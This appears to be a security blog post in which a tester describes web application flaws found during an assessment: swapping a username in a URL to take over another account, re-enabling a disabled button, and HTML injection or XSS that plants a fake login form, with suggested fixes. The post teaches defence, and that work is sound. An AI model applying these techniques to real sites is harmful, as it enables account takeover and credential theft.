This post is about something very common among web applications, user input validation. I’ve assessed a ton of web applications that relies in trusting the good behavior of users and hoping they respect, or at least don’t discover, what his current user profile is able to do. This can be translated in a bad development practice and this leads us to the root cause of this problem which is the lack of user input validation (checking every command a user sends to a application) and just “hiding” the menus a user is not supposed to have access to (hidden links).
It is pretty common that developers build their application with just a single authorization step, once you’ve passed the login screen, the application assumes that anything the user does beyond that point is an authorized action and no further profile and credentials check will be necessary. This also comes with the “menu hiding” where the functions that the user is not supposed to access is just with the “hidden” attribute.
To illustrate this, I’ll be showing a practical example, a application that I’ve assessed in the past.
The image above is the web app, pretty simple and straight forward this app was developed to register tickets and services. The highlighted text above is the user name that logged in, this is already a bad practice itself since this is a sensible information that could be easily captured or stored by the browsing history. This example is really simple, all we need to execute this vulnerability is to know another valid username and just change it in the URL itself. This URL is supposed to be something that the regular user would never see, the web app use redirects and URL rewrites to obfuscate this information but this comes to light when you use a web debugger tool.
Here’s the view from the web debugger tool, which shows the full URL. We just have to change the user name e see if the application accepts the new input without validating it.
And there we go, the application just assumed that the user “alexb” made the request since his username was supplied on the previous request. This allowed me to log into another user account without knowing it’s password. This kind of problem can be remediated by issuing a credential check at each request made by the application or implementing a session ID system that confirms if the currently logged user has enough permissions to execute his command.
Another easy to exploit example can be seen below:
In the above image, I’m highlighting a button that were disabled, probably because the function was already developed but not yet in production, so the developer decided to just disable the button and leave the function working on the background until it gets to a production phase. By checking the source code of the web app we can see that the button is just disabled, if you are wondering what would happen if we just enable and click the button, here it is:
By enabling the button and clicking it, I got into the disabled portion of the web app. Although this may seem to be something really simple to do, this is a real world example of how some web applications are developed, this example is applicable to many other kinds of attacks that have the same root cause, a bad development practice and trusting the good will of the user.
To finish this post, I’ll show you how some types of HTML injection and XSS (Cross-site scripting) attacks works. OWASP states that:
“Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.”
In other words, XSS happens when you send a command to the web application so it would “render” or process it and show the results to you. This is widely used to trick users into believing that they’re accessing a trustworthy site, when in the reality, is a malicious copy of the original one, designed to steal information.
The above image is the example. The red rectangle shows the vulnerable parameter, this resembles to the upper statement that I’ve made, lack of user input validation. This is possible because this parameter shows a message to the user with something that he sent to the web app, without checking it to see if there’s anything malicious.
The orange rectangle is the malicious command I’ve sent, it is a set of HTML instructions that builds up a user and password form (blue rectangle). The idea is to convince the legitimate user to send his information to me (attacker). Since he’s still on the trustworthy web site, this would seem pretty secure and legitimate.
Cross-site scripting attacks are really hard to avoid and can be found in many web sites around the web, but there are a few things you can do to mitigate this, the main objective is to filter user input to something that the application can trust and is expected to receive. I strongly recommend you to check out OWASP guide to avoid XSS attacks, which can be found here: